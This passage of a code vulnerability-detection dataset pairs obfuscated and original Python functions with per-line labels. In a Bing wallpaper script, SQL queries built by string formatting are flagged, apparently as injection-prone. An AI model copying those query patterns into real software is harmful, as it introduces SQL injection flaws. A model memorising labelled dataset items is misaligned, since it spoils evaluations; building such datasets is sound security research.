"dt = dateutil_parse(value, ignoretz=True).replace(microsecond=0)\n",
"return dt - timedelta(seconds=(dt - dt.min).seconds % alignment)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_8():...\n",
"VAR_10 = get_executing_test()\n",
"VAR_5 = VAR_10.spynner_browser\n",
"if VAR_5:\n",
"VAR_10.spynner_browser = None\n",
"VAR_5.close()\n"
] | [
"def stop_spynner_browser():...\n",
"test = get_executing_test()\n",
"browser = test.spynner_browser\n",
"if browser:\n",
"test.spynner_browser = None\n",
"browser.close()\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'"
] |
[
"def FUNC_7(self):...\n",
"VAR_1 = '/api/apps'\n",
"VAR_2 = self.client.post(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_3 = VAR_2.data['id']\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_4 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 2)\n",
"VAR_1 = '/api/apps/{app_id}/releases'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 2)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 1)\n",
"chaos.CREATE_ERROR_RATE = 1\n",
"VAR_1 = '/api/apps/{app_id}/run'.format(**locals())\n",
"VAR_4 = {'command': 'ls -al'}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 503)\n"
] | [
"def test_run_chaos(self):...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 2)\n",
"url = '/api/apps/{app_id}/releases'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 2)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"chaos.CREATE_ERROR_RATE = 1\n",
"url = '/api/apps/{app_id}/run'.format(**locals())\n",
"body = {'command': 'ls -al'}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 503)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_6(self, VAR_26):...\n",
"if VAR_26:\n",
"VAR_106 = int(VAR_26, 36)\n",
"abort(404, 'page not found')\n",
"return Message._byID(VAR_106, True)\n"
] | [
"def run(self, message_id):...\n",
"if message_id:\n",
"aid = int(message_id, 36)\n",
"abort(404, 'page not found')\n",
"return Message._byID(aid, True)\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Expr'",
"Return'"
] |
[
"@odin.map_list_field(to_field='array_string')...\n",
"return VAR_47.split(',')\n"
] | [
"@odin.map_list_field(to_field='array_string')...\n",
"return value.split(',')\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"@app.route('/api/settings', methods=['PUT'])...\n",
"controller.settings.update(VAR_3)\n",
"VAR_13 = controller.settings.to_map()\n",
"return dict([setting for setting in VAR_13.items() if setting[0] in VAR_3])\n"
] | [
"@app.route('/api/settings', methods=['PUT'])...\n",
"controller.settings.update(json)\n",
"updated_settings = controller.settings.to_map()\n",
"return dict([setting for setting in updated_settings.items() if setting[0] in\n json])\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Expr'",
"Assign'",
"Return'"
] |
[
"@eqlx.with_timeout...\n",
"time.sleep(1)\n"
] | [
"@eqlx.with_timeout...\n",
"time.sleep(1)\n"
] | [
0,
0
] | [
"Condition",
"Expr'"
] |
[
"def FUNC_14(self):...\n",
"VAR_5 = None\n",
"VAR_5 = tempfile.NamedTemporaryFile(delete=False)\n",
"if VAR_5:\n",
"VAR_5.close()\n",
"os.remove(VAR_5.name)\n",
"self._mox.StubOutWithMock(url_helper, 'UrlOpen')\n",
"VAR_12 = 'data'\n",
"url_helper.UrlOpen(mox.IgnoreArg(), method='GET').AndReturn(VAR_12)\n",
"self._mox.ReplayAll()\n",
"self.assertTrue(url_helper.DownloadFile(VAR_5.name, 'http://www.fakeurl.com'))\n",
"self.assertEqual(VAR_12, f.read())\n",
"self._mox.VerifyAll()\n"
] | [
"def testDownloadFile(self):...\n",
"local_file = None\n",
"local_file = tempfile.NamedTemporaryFile(delete=False)\n",
"if local_file:\n",
"local_file.close()\n",
"os.remove(local_file.name)\n",
"self._mox.StubOutWithMock(url_helper, 'UrlOpen')\n",
"file_data = 'data'\n",
"url_helper.UrlOpen(mox.IgnoreArg(), method='GET').AndReturn(file_data)\n",
"self._mox.ReplayAll()\n",
"self.assertTrue(url_helper.DownloadFile(local_file.name,\n 'http://www.fakeurl.com'))\n",
"self.assertEqual(file_data, f.read())\n",
"self._mox.VerifyAll()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_4(self):...\n",
"if self._user_notified_about_crash or self._IsServerAlive():\n",
"return\n",
"self._user_notified_about_crash = True\n",
"if self._server_stderr:\n",
"VAR_27 = ''.join(server_stderr_file.readlines()[:-VAR_1])\n",
"vimsupport.PostVimMessage(VAR_3)\n",
"vimsupport.PostMultiLineNotice(VAR_2 + VAR_27)\n"
] | [
"def _NotifyUserIfServerCrashed(self):...\n",
"if self._user_notified_about_crash or self._IsServerAlive():\n",
"return\n",
"self._user_notified_about_crash = True\n",
"if self._server_stderr:\n",
"error_output = ''.join(server_stderr_file.readlines()[:-\n NUM_YCMD_STDERR_LINES_ON_CRASH])\n",
"vimsupport.PostVimMessage(SERVER_CRASH_MESSAGE_SAME_STDERR)\n",
"vimsupport.PostMultiLineNotice(SERVER_CRASH_MESSAGE_STDERR_FILE + error_output)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_6(self):...\n",
""
] | [
"def book_ride(self):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"VAR_1 = '/api/apps'\n",
"VAR_2 = self.client.post(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_3 = VAR_2.data['id']\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_4 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 1)\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 20}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 204)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 20)\n",
"chaos.DESTROY_ERROR_RATE = 0.5\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 0}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 503)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"VAR_5 = set([c['state'] for c in VAR_2.data['results']])\n",
"self.assertEqual(VAR_5, set(['error']))\n",
"VAR_6 = 20\n",
"for _ in range(100):\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 0}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"if VAR_2.status_code == 204:\n",
"self.assertEquals(VAR_2.status_code, 503)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"VAR_6 = len(VAR_2.data['results'])\n"
] | [
"def test_destroy_chaos(self):...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 20}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 204)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 20)\n",
"chaos.DESTROY_ERROR_RATE = 0.5\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 0}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 503)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"states = set([c['state'] for c in response.data['results']])\n",
"self.assertEqual(states, set(['error']))\n",
"containers = 20\n",
"for _ in range(100):\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 0}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"if response.status_code == 204:\n",
"self.assertEquals(response.status_code, 503)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"containers = len(response.data['results'])\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"For",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"@utils.synchronized('3par', external=True)...\n",
""
] | [
"@utils.synchronized('3par', external=True)...\n",
""
] | [
0,
0
] | [
"Condition",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"self._tab_after('s')\n",
"eq_(self.terminal.method_calls, [('write', ('et ',), {})])\n"
] | [
"def test_command_completion(self):...\n",
"self._tab_after('s')\n",
"eq_(self.terminal.method_calls, [('write', ('et ',), {})])\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_38(VAR_65, VAR_66):...\n",
"VAR_79 = ElementTree.parse(VAR_66).getroot()\n",
"if VAR_79.tag != 'plugin':\n",
"return VAR_79.find('name').text\n"
] | [
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"def process_info_file(cp_elem, info_file):...\n",
"plugin_info = ElementTree.parse(info_file).getroot()\n",
"if plugin_info.tag != 'plugin':\n",
"return plugin_info.find('name').text\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"FunctionDef'",
"Assign'",
"Condition",
"Return'"
] |
[
"\"\"\"This module contains the device class and context manager\"\"\"\n",
"import abc\n",
"import logging\n",
"logging.getLogger()\n",
"\"\"\"string\"\"\"\n",
"def __getattr__(VAR_0, VAR_1):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_7(*VAR_15, **VAR_16):...\n",
"\"\"\"docstring\"\"\"\n",
"return VAR_0(VAR_1, *VAR_15, **kwargs)\n"
] | [
"\"\"\"This module contains the device class and context manager\"\"\"\n",
"import abc\n",
"import logging\n",
"logging.getLogger()\n",
"\"\"\"Metaclass that allows derived classes to dynamically instantiate\n new objects based on undefined methods. The dynamic methods pass their arguments\n directly to __init__ of the inheriting class.\"\"\"\n",
"def __getattr__(cls, name):...\n",
"\"\"\"docstring\"\"\"\n",
"def new_object(*args, **kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"return cls(name, *args, **kwargs)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"from binance.client import Client\n",
"import configparser\n",
"import sqlite3\n",
"def FUNC_0(VAR_0, VAR_1=',', VAR_2=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return [chunk.strip(VAR_2) for chunk in VAR_0.split(VAR_1)]\n"
] | [
"from binance.client import Client\n",
"import configparser\n",
"import sqlite3\n",
"def getlist(option, sep=',', chars=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return [chunk.strip(chars) for chunk in option.split(sep)]\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self, VAR_2, VAR_3, VAR_4, *VAR_5):...\n",
"self.write_data({'type': 'torrent_discovered', 'event': VAR_5[0]})\n"
] | [
"def on_torrent_discovered(self, subject, changetype, objectID, *args):...\n",
"self.write_data({'type': 'torrent_discovered', 'event': args[0]})\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_8():...\n",
"VAR_12 = {}\n",
"VAR_13 = request.authorization\n",
"VAR_14 = request.headers\n",
"if VAR_13 and VAR_13.get('username'):\n",
"if not VAR_13.get('password'):\n",
"if 'X-Auth-Token' in VAR_14 and 'X-Auth-From' in VAR_14:\n",
"VAR_12['version'], VAR_12['user_type'], VAR_12['from'] = FUNC_7(VAR_13[\n 'username'])\n",
"if not VAR_14.get('X-Auth-Token'):\n",
"return VAR_12\n",
"VAR_12['token'] = VAR_13['password']\n",
"VAR_12['version'], VAR_12['user_type'], VAR_12['from'] = FUNC_7(VAR_14[\n 'X-Auth-From'])\n",
"VAR_12['token'] = VAR_14['X-Auth-Token']\n"
] | [
"def _get_kms_auth_data():...\n",
"data = {}\n",
"auth = request.authorization\n",
"headers = request.headers\n",
"if auth and auth.get('username'):\n",
"if not auth.get('password'):\n",
"if 'X-Auth-Token' in headers and 'X-Auth-From' in headers:\n",
"data['version'], data['user_type'], data['from'] = _parse_username(auth[\n 'username'])\n",
"if not headers.get('X-Auth-Token'):\n",
"return data\n",
"data['token'] = auth['password']\n",
"data['version'], data['user_type'], data['from'] = _parse_username(headers[\n 'X-Auth-From'])\n",
"data['token'] = headers['X-Auth-Token']\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Condition",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._unit_of_measurement\n"
] | [
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._unit_of_measurement\n"
] | [
0,
0,
0
] | [
"Condition",
"Docstring",
"Return'"
] |
[
"import sys\n",
"import os\n",
"import sqlite3\n",
"import requests\n",
"from PIL import Image\n",
"from io import BytesIO\n",
"from configs import *\n",
"VAR_0 = 10\n",
"def FUNC_0():...\n",
"if len(sys.argv) > 1:\n",
"VAR_0 = int(sys.argv[1])\n",
"if sys.version_info.major < 3:\n",
"print('This script only runs in python3')\n",
"VAR_1 = './data'\n",
"return\n",
"if not os.path.isdir(VAR_1):\n",
"os.makedirs(VAR_1)\n",
"VAR_2 = os.path.join(VAR_1, '{}_{}'.format(resolution_width, resolution_height)\n )\n",
"if not os.path.isdir(VAR_1):\n",
"if not os.path.isdir(VAR_2):\n",
"print(\"Failed to create data path '{}'\".format(VAR_1))\n",
"os.makedirs(VAR_2)\n",
"VAR_3 = sqlite3.connect('./data/data.db')\n",
"return\n",
"if not os.path.isdir(VAR_2):\n",
"VAR_4 = VAR_3.cursor()\n",
"print(\"Failed to create image path '{}'\".format(VAR_2))\n",
"VAR_4.execute(\n \"\"\"\n select name from sqlite_master\n where type='table' and name='wallpapers'\n \"\"\"\n )\n",
"return\n",
"if VAR_4.fetchone() == None:\n",
"VAR_4.execute('string')\n",
"VAR_5 = 0\n",
"while VAR_5 <= VAR_0:\n",
"VAR_6 = (\n 'https://www.bing.com/HPImageArchive.aspx?format=js&idx={}&n=1&mkt=en-US'\n .format(VAR_5))\n",
"VAR_3.commit()\n",
"print(\"Getting iamge list from '{}'\".format(VAR_6))\n",
"VAR_4.close()\n",
"VAR_7 = requests.get(VAR_6)\n",
"VAR_3.close()\n",
"if VAR_7.status_code != requests.codes.ok:\n",
"if __name__ == '__main__':\n",
"print(\"Failed to get url '{}'\".format(VAR_6))\n",
"VAR_8 = VAR_7.json()\n",
"FUNC_0()\n",
"VAR_9 = VAR_8['images'][0]['startdate']\n",
"VAR_10 = VAR_8['images'][0]['urlbase']\n",
"VAR_11 = VAR_8['images'][0]['url']\n",
"VAR_12 = VAR_8['images'][0]['copyright']\n",
"VAR_4.execute(\n \"\"\"\n select * from wallpapers\n where image_date='{}'\n \"\"\"\n .format(VAR_9))\n",
"if VAR_4.fetchone() == None:\n",
"VAR_4.execute('string'.format(VAR_9, VAR_10, VAR_12))\n",
"VAR_13 = os.path.join(VAR_2, '{}.jpg'.format(VAR_9))\n",
"print('## Inserted image {} to database ##'.format(VAR_9))\n",
"if not os.path.isfile(VAR_13):\n",
"VAR_14 = 'https://www.bing.com{}_{}x{}.jpg'.format(VAR_10, resolution_width,\n resolution_height)\n",
"VAR_5 += 1\n",
"print(\"## Downloading image from '{}'\".format(VAR_14))\n",
"VAR_15 = requests.get(VAR_14)\n",
"if VAR_15.status_code != requests.codes.ok:\n",
"print(\"Failed to get url '{}'\".format(VAR_14))\n",
"VAR_16 = Image.open(BytesIO(VAR_15.content))\n",
"VAR_16.save(VAR_13)\n",
"print('## Downloaded image {} ##'.format(VAR_13))\n"
] | [
"import sys\n",
"import os\n",
"import sqlite3\n",
"import requests\n",
"from PIL import Image\n",
"from io import BytesIO\n",
"from configs import *\n",
"NUM_IMAGES_TO_GET = 10\n",
"def main():...\n",
"if len(sys.argv) > 1:\n",
"NUM_IMAGES_TO_GET = int(sys.argv[1])\n",
"if sys.version_info.major < 3:\n",
"print('This script only runs in python3')\n",
"data_dir = './data'\n",
"return\n",
"if not os.path.isdir(data_dir):\n",
"os.makedirs(data_dir)\n",
"image_dir = os.path.join(data_dir, '{}_{}'.format(resolution_width,\n resolution_height))\n",
"if not os.path.isdir(data_dir):\n",
"if not os.path.isdir(image_dir):\n",
"print(\"Failed to create data path '{}'\".format(data_dir))\n",
"os.makedirs(image_dir)\n",
"conn = sqlite3.connect('./data/data.db')\n",
"return\n",
"if not os.path.isdir(image_dir):\n",
"c = conn.cursor()\n",
"print(\"Failed to create image path '{}'\".format(image_dir))\n",
"c.execute(\n \"\"\"\n select name from sqlite_master\n where type='table' and name='wallpapers'\n \"\"\"\n )\n",
"return\n",
"if c.fetchone() == None:\n",
"c.execute(\n \"\"\"\n create table wallpapers (\n id integer primary key autoincrement not null,\n image_date text not null,\n url_base text not null,\n copyright text not null)\n \"\"\"\n )\n",
"idx = 0\n",
"while idx <= NUM_IMAGES_TO_GET:\n",
"list_url = (\n 'https://www.bing.com/HPImageArchive.aspx?format=js&idx={}&n=1&mkt=en-US'\n .format(idx))\n",
"conn.commit()\n",
"print(\"Getting iamge list from '{}'\".format(list_url))\n",
"c.close()\n",
"r = requests.get(list_url)\n",
"conn.close()\n",
"if r.status_code != requests.codes.ok:\n",
"if __name__ == '__main__':\n",
"print(\"Failed to get url '{}'\".format(list_url))\n",
"j = r.json()\n",
"main()\n",
"image_date = j['images'][0]['startdate']\n",
"url_base = j['images'][0]['urlbase']\n",
"url = j['images'][0]['url']\n",
"copyright = j['images'][0]['copyright']\n",
"c.execute(\n \"\"\"\n select * from wallpapers\n where image_date='{}'\n \"\"\"\n .format(image_date))\n",
"if c.fetchone() == None:\n",
"c.execute(\n \"\"\"\n insert into wallpapers (image_date, url_base, copyright)\n values ('{}', '{}', '{}')\n \"\"\"\n .format(image_date, url_base, copyright))\n",
"image_path = os.path.join(image_dir, '{}.jpg'.format(image_date))\n",
"print('## Inserted image {} to database ##'.format(image_date))\n",
"if not os.path.isfile(image_path):\n",
"image_url = 'https://www.bing.com{}_{}x{}.jpg'.format(url_base,\n resolution_width, resolution_height)\n",
"idx += 1\n",
"print(\"## Downloading image from '{}'\".format(image_url))\n",
"r_image = requests.get(image_url)\n",
"if r_image.status_code != requests.codes.ok:\n",
"print(\"Failed to get url '{}'\".format(image_url))\n",
"image = Image.open(BytesIO(r_image.content))\n",
"image.save(image_path)\n",
"print('## Downloaded image {} ##'.format(image_path))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"FunctionDef'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Return'",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Assign'",
"Return'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Return'",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"AugAssign'",
"Expr'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_26():...\n",
"frappe.throw(_('Cannot use sub-query or function in fields'), frappe.DataError)\n"
] | [
"def _raise_exception():...\n",
"frappe.throw(_('Cannot use sub-query or function in fields'), frappe.DataError)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_5(self):...\n",
"VAR_22 = self.add_argument_group('Mechanical Turk')\n",
"VAR_23 = VAR_20.path.join(self.parlai_home, 'logs', 'mturk')\n",
"VAR_22.add_argument('--mturk-log-path', default=default_log_path, help=\n 'path to MTurk logs, defaults to {parlai_dir}/logs/mturk')\n",
"VAR_22.add_argument('-t', '--task', help=\n 'MTurk task, e.g. \"qa_data_collection\" or \"model_evaluator\"')\n",
"VAR_22.add_argument('-nc', '--num-conversations', default=1, type=int, help\n ='number of conversations you want to create for this task')\n",
"VAR_22.add_argument('--unique', dest='unique_worker', default=False, action\n ='store_true', help='enforce that no worker can work on your task twice')\n",
"VAR_22.add_argument('--unique-qual-name', dest='unique_qual_name', default=\n None, type=str, help=\n 'qualification name to use for uniqueness between HITs')\n",
"VAR_22.add_argument('-r', '--reward', default=0.05, type=float, help=\n 'reward for each worker for finishing the conversation, in US dollars')\n",
"VAR_22.add_argument('--sandbox', dest='is_sandbox', action='store_true',\n help='submit the HITs to MTurk sandbox site')\n",
"VAR_22.add_argument('--live', dest='is_sandbox', action='store_false', help\n ='submit the HITs to MTurk live site')\n",
"VAR_22.add_argument('--debug', dest='is_debug', action='store_true', help=\n 'print and log all server interactions and messages')\n",
"VAR_22.add_argument('--verbose', dest='verbose', action='store_true', help=\n 'print all messages sent to and from Turkers')\n",
"VAR_22.add_argument('--hard-block', dest='hard_block', action='store_true',\n default=False, help=\n 'Hard block disconnecting Turkers from all of your HITs')\n",
"VAR_22.add_argument('--log-level', dest='log_level', type=int, default=20,\n help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n",
"VAR_22.add_argument('--block-qualification', dest='block_qualification',\n default='', help=\n 'Qualification to use for soft blocking users. By default turkers are never blocked, though setting this will allow you to filter out turkers that have disconnected too many times on previous HITs where this qualification was set.'\n )\n",
"VAR_22.add_argument('--count-complete', dest='count_complete', default=\n False, action='store_true', help=\n 'continue until the requested number of conversations are completed rather than attempted'\n )\n",
"VAR_22.add_argument('--allowed-conversations', dest='allowed_conversations',\n default=0, type=int, help=\n 'number of concurrent conversations that one mturk worker is able to be involved in, 0 is unlimited'\n )\n",
"VAR_22.add_argument('--max-connections', dest='max_connections', default=30,\n type=int, help=\n 'number of HITs that can be launched at the same time, 0 is unlimited.')\n",
"VAR_22.add_argument('--min-messages', dest='min_messages', default=0, type=\n int, help=\n 'number of messages required to be sent by MTurk agent when considering whether to approve a HIT in the event of a partner disconnect. I.e. if the number of messages exceeds this number, the turker can submit the HIT.'\n )\n",
"VAR_22.add_argument('--local', dest='local', default=False, action=\n 'store_true', help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n",
"VAR_22.set_defaults(is_sandbox=True)\n",
"VAR_22.set_defaults(is_debug=False)\n",
"VAR_22.set_defaults(verbose=False)\n"
] | [
"def add_mturk_args(self):...\n",
"mturk = self.add_argument_group('Mechanical Turk')\n",
"default_log_path = os.path.join(self.parlai_home, 'logs', 'mturk')\n",
"mturk.add_argument('--mturk-log-path', default=default_log_path, help=\n 'path to MTurk logs, defaults to {parlai_dir}/logs/mturk')\n",
"mturk.add_argument('-t', '--task', help=\n 'MTurk task, e.g. \"qa_data_collection\" or \"model_evaluator\"')\n",
"mturk.add_argument('-nc', '--num-conversations', default=1, type=int, help=\n 'number of conversations you want to create for this task')\n",
"mturk.add_argument('--unique', dest='unique_worker', default=False, action=\n 'store_true', help='enforce that no worker can work on your task twice')\n",
"mturk.add_argument('--unique-qual-name', dest='unique_qual_name', default=\n None, type=str, help=\n 'qualification name to use for uniqueness between HITs')\n",
"mturk.add_argument('-r', '--reward', default=0.05, type=float, help=\n 'reward for each worker for finishing the conversation, in US dollars')\n",
"mturk.add_argument('--sandbox', dest='is_sandbox', action='store_true',\n help='submit the HITs to MTurk sandbox site')\n",
"mturk.add_argument('--live', dest='is_sandbox', action='store_false', help=\n 'submit the HITs to MTurk live site')\n",
"mturk.add_argument('--debug', dest='is_debug', action='store_true', help=\n 'print and log all server interactions and messages')\n",
